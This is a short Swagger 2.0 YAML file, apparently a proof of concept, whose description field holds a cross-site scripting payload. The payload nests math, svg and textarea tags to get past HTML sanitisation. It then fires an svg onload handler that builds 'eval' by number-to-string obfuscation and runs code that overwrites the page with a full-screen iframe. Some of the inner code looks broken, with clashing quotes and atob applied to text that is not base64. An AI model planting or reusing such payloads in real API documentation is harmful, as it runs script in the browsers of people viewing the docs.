
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><svg/onload=window[490837..toString(1<<5)](atob('document.addEventListener("DOMContentLoaded", function(event) {

	  var pocpage = "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        <title>Let's Mine Time</title>
		<p>test
        <style type="text/css">
            body, html
            {
                margin: 0; padding: 0; height: 100%; overflow: hidden;
            }

            #content
            {
                position:absolute; left: 0; right: 0; bottom: 0; top: 0px; 
            }
        </style>
    </head>
    <body>
    <center>
        <div id="content">
            <iframe width="1200" height="600" frameborder="0" src="{https://classic.minecraft.net/?size=small}" />
        </div>
        </center>
    </body>
    </html>";

	  document.open();

	  document.write(atob(pocpage));

	  document.close();

    });'))>">
